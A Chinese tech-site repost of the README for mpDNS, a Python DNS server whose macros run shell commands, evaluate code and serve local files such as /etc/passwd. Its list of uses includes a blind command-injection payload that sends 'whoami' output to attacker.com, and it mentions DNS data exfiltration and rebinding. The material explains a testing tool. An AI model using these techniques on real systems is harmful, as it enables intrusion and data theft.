您的位置:首頁 > 服務器硬件技術

                                            mpDNS:Python實現的多功能DNS服務器

                                            發布時間:2022-04-11 15:15:34  來源:IT資訊網    采編:author  背景:

                                            簡單、可配置的" clone和run "DNS服務器,具有多種有用的功能。

                                            適用于Python 2和3

                                            names.db – >包含所有自定義記錄(參見示例)

                                            簡單的通配符,如* .example.com

                                            捕獲unicode dns請求

                                            自定義動作又稱宏:

                                            -{{shellexec::diggoogle.com+short}}–>執行shell命令并使用result響應-{{eval::res='1.1.1.%d'%random.randint(0,256)}}->評估你的python代碼-{{file::/etc/passwd}}–>回復本地文件內容-{{resolve}}–>將DNS請求轉發到本地系統DNS-{{resolve::example.com}}–>解析example.com而不是原始記錄-{{echo}}–>回復對等地址-{{shellexec::echo%PEER%%QUERY%}}–>使用變量

                                            支持的查詢類型:A,CNAME,TXT

                                            更新names.db記錄而不重啟/重新加載./mpdns.py -e

                                            重度基于https://github.com/circuits/circuits/blob/master/examples/dnsserver.py

                                            用法: ./mpdns.py

                                            編輯names.db,./mpdns.py -e無需重啟

                                            進攻和防守目的:

                                            1.您需要一個輕量級的簡單DNS服務器解決方案用于測試目的(不生產!)

                                            2.測試Web應用程序中的各種盲注漏洞(例如/ping.php?ip=$(dig $(whoami).attacker.com))

                                            3.在一個TXT查詢中輕松滲透65K數據

                                            4.DNS重新綁定

                                            5.對特定查詢執行自定義宏操作(在惡意軟件分析實驗室環境中很有用)

                                            6.還有更多。它是高度可定制的。

                                            安裝

                                            git clone https://github.com/nopernik/mpDNS

                                            限制

                                            1.由于UDP數據報限制為65535字節,DNS響應限制在約65200字節, 此限制適用于TXT分成256字節塊的記錄,直到響應達到***允許值65200b, 因此TXT宏記錄{{file:localfile.txt}}限制為65200字節。

                                            2.不支持嵌套通配符 test.*.example.com

                                            3.{{resolve::example.com}}宏中不支持自定義DNS服務器解析程序

                                            4.TTL始終設為0

                                            例子

                                            names.db示例:

                                            #Emptyconfigurationwillresultinemptybutvalidresponses##Unicodedomainnamesarenotsupportedbutstillcanbecatchedbytheserver.#forexampleмама-сервер-unicode.google.comwillbecatchedbutwithSERVFAILresponsepasswd.example.comTXT{{file::/etc/passwd}}#commentsareignoredshellexecTXT{{shellexec::whoami}}evalTXT{{eval::importrandom;res=random.randint(1,500)}}resolve1A{{resolve}}resolve2A{{resolve::self}}#sameaspreviousresolve3A{{resolve::example.com}}blabla.comA5.5.5.5*A127.0.0.1*.example.comA7.7.7.7c1.example.comCNAMEc2.example.comc2.example.comCNAMEc3.example.comc3.example.comCNAMEgoogle.example.comgoogle.example.comCNAMEgoogle.comtest.example.comA8.8.8.8google.comA{{resolve::self}}notgoogle.comA{{resolve::google.com}}

                                            使用names.db示例輸出示例:

                                            DB的定期解決方案:

                                            digtest.example.com@localhost;;ANSWERSECTION:test.example.com.0INA8.8.8.8

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:57698->test.example.com.->8.8.8.8(A)

                                            遞歸CNAME解析:

                                            digc1.example.com@localhost;;QUESTIONSECTION:;c1.example.com.INA;;ANSWERSECTION:c1.example.com.0INCNAMEc2.example.com.c2.example.com.0INCNAMEc3.example.com.c3.example.com.0INCNAMEgoogle.example.com.google.example.com.0INCNAMEgoogle.com.google.com.0INA216.58.206.14

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:44120->c1.example.com.->c2.example.com(CNAME)-Requestfrom127.0.0.1:44120->c2.example.com->c3.example.com(CNAME)-Requestfrom127.0.0.1:44120->c3.example.com->google.example.com(CNAME)-Requestfrom127.0.0.1:44120->google.example.com->google.com(CNAME)-Requestfrom127.0.0.1:44120->google.com->{{resolve::self}}(A)

                                            通配符解析:

                                            dignot-in-db.com@localhost;;ANSWERSECTION:not-in-db.com.0INA127.0.0.1

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:38528->not-in-db.com.->127.0.0.1(A)

                                            通配符子域解析:

                                            digwildcard.example.com@localhost;;ANSWERSECTION:wildcard.example.com.0INA7.7.7.7

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:39691->wildcard.example.com.->7.7.7.7(A)

                                            轉發請求宏:

                                            diggoogle.com@localhost;;ANSWERSECTION:google.com.0INA172.217.22.110

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:53487->google.com.->{{resolve::self}}(A)

                                            自定義域宏的轉發請求:

                                            dignotgoogle.com@localhost;;ANSWERSECTION:notgoogle.com.0INA172.217.22.110

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:47797->notgoogle.com.->{{resolve::google.com}}(A)

                                            通過TXT查詢文件內容宏:

                                            digtxtpasswd.example.com@localhost;;ANSWERSECTION:passwd.example.com.0INTXT"root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:38805->passwd.example.com.->['root:x:0:0:root...(2808)'](TXT)

                                            通過TXT查詢自定義python代碼宏:

                                            digtxteval@localhost;;ANSWERSECTION:eval.0INTXT"320"

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:33821->eval.->['320'](TXT)

                                            Shell命令宏通過TXT查詢:

                                            digtxtshellexec@localhost;;ANSWERSECTION:shellexec.0INTXT"root"

                                            mpDNS輸出:

                                            -Requestfrom127.0.0.1:50262->shellexec.->['root'](TXT)

                                              聲明:本文僅為傳遞更多網絡信息,不代表IT資訊網觀點和意見,僅供參考了解,更不能作為投資使用依據。


                                            返回網站首頁 本文來源:IT資訊網

                                            本文評論
                                            清華校友吳旻當選IEEE SPS首位華裔女主席,曾發明“數字水印”
                                            剛剛,IEEE信號處理學會 (SPS)2022-2023候任主席公布。
                                            日期:03-27
                                            環境數據與物聯網:完美結合
                                            有證據表明,當以與人的生活特別相關的方式提供環境信息
                                            日期:03-13
                                            微軟正重構Windows 10任務欄:不激活系統的用戶將面臨更多功能受限
                                            對任務欄的這一調整將影響到那些尚未激活操作系統的用
                                            日期:02-16
                                            手機版Windows 10 Build 10586的截圖早知道
                                            Windows 10 Build 10586已經被選定為“Threshold 2”
                                            日期:03-26
                                            WOT全球技術創新大會2022:十二大熱門專題已確認上線,請查收!
                                            隨著新一輪技術革命的到來,技術創新已成為全球發展的核
                                            日期:03-13
                                            亞信安全專家做客搜狐,解讀WannaCry勒索蠕蟲!
                                            今天10:00,我們的安全專家劉政平將做客搜狐直播,現場解
                                            日期:03-22
                                            物聯網關鍵技術:云原生容器技術在邊緣計算中的應用
                                            隨著云計算的應用普及,最近幾年,云原生技術(Cloud Native
                                            日期:03-19
                                            可穿戴設備走進Google世界:Google Fit預覽版SDK發布
                                            無論是智能手環,還是面向運動愛好者的Apps,這兩年左右的
                                            日期:03-08
                                            全公司裁了70%,CTO親自寫代碼!
                                            10 月 11 日晚間,據媒體報道,貝殼找房上海研發團隊全員
                                            日期:03-26
                                            聯想劉軍:智慧服務新財年營收目標高增34%,對標千億美元市值ServiceNow
                                            新財年聯想中國將實施“智能產品、智能基礎設施和智慧
                                            日期:02-17
                                            掉電是數據中心無法抹去的痛
                                            電源對于數據中心的重要性就好比心臟對人類的重要程度
                                            日期:03-12
                                            掃描 Linux 服務器是否存在惡意軟件和安全漏洞的十種優秀工具
                                            市場上有各種威脅檢測工具,但是由于每種工具都可用于不
                                            日期:03-06
                                             

                                            精品无码久久午夜福利